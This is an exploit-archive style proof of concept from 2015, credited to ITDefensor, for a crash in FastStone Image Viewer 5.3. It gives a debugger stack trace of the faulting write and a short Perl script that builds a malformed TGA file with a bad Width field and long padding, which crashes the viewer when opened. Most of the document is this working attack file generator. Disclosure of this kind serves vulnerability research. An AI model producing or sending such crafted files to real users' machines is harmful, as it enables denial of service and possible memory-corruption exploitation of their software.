# Exploit Title : FastStoneImage Viewer (Corrupted tga) IMAGESPECIFICATION.Width Crash POC
# Product : FastStoneImage Viewer
# Date: 25.02.2015
# Exploit Author: ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link : http://www.faststone.org/FSViewerDownload.htm
# Vulnerable version: 5.3 (Latest at the moment) and probably previous versions
# Vendor Homepage : http://www.faststone.org/
# Tested on : FastStoneImage Viewer 5.3 installed on Windows 7 x64, Windows Server 2008
# CVE : unknown at the moment
# Open created POC file (poc.tga) with FastStoneImage Viewer
# Details
#*** ERROR: Module load completed but symbols could not be loaded for image00000000`00400000
#00409357 893amov dword ptr [edx],edids:002b:00e00880=????????
#0:000:x86> kb
#ChildEBP RetAddrArgs to Child
#WARNING: Stack unwind information not available. Following frames may be wrong.
#0018f688 004ff000 0018f6b4 00404619 0018f6ac image00000000_00400000+0x9357
#0018f6ac 00425374 0018f6c0 0042537e 0018f6d8 image00000000_00400000+0xff000
#0018f6d8 004255a2 0018f72c 0018f6f0 004256bb image00000000_00400000+0x25374
#0018f72c 004257ee 0018f784 00425822 0018f758 image00000000_00400000+0x255a2
#!/usr/bin/perl -w
$tga_id = "tga poc example" ;
$tga_header = "\xf" . # IDLength
"\x00" . # ColorMapType
"\xa" ; # ImageType
$tga_cms_spec = "\x00\x00" . # FirstIndexEntry
"\x00\x00" . # ColorMapLength
"\x00" ; # ColorMapEntrySize
$tga_image_spec = "\x00\x00" . # XOrigin
"\x00\x00" . # YOrigin
"\x00\xa0" . # Width <--- ! Incorrect field, leads to application crash
"\x80\x00" . # Height
"\x10" . # PixelDepth
"\x1" ; # ImageDescriptor
$tga_file_header = $tga_header . $tga_cms_spec . $tga_image_spec . $tga_id ;
$tga = $tga_file_header . "a" x 10000 ;
open FILE, ">poc.tga" or die("Can't open poc.tga\n") ;
binmode(FILE) ;
print FILE $tga ;
close FILE ;